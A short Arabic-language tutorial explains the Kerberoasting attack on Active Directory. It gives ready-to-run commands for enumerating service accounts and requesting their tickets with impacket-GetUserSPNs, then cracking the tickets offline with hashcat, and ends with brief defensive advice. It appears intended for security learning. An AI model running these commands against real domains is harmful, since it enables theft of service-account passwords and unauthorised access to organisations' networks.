ما هو Kerberoasting؟
Kerberoasting هجوم يستغل بروتوكول Kerberos لطلب تذاكر خدمة (TGS) لحسابات الخدمة، ثم كسر تشفيرها offline.
الشروط المسبقة
- حساب مستخدم عادي في الدومين (لا يحتاج صلاحيات مرتفعة)
- حسابات خدمة مرتبطة بـ SPN
الخطوات
1. البحث عن SPNs
impacket-GetUserSPNs -dc-ip 10.10.10.1 DOMAIN/user:password
2. طلب التذاكر
impacket-GetUserSPNs -dc-ip 10.10.10.1 DOMAIN/user:password -request
3. كسر التشفير
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
الحماية
- استخدم كلمات مرور طويلة (+25 حرف) لحسابات الخدمة
- فعّل Managed Service Accounts (MSA)
- راقب طلبات TGS المشبوهة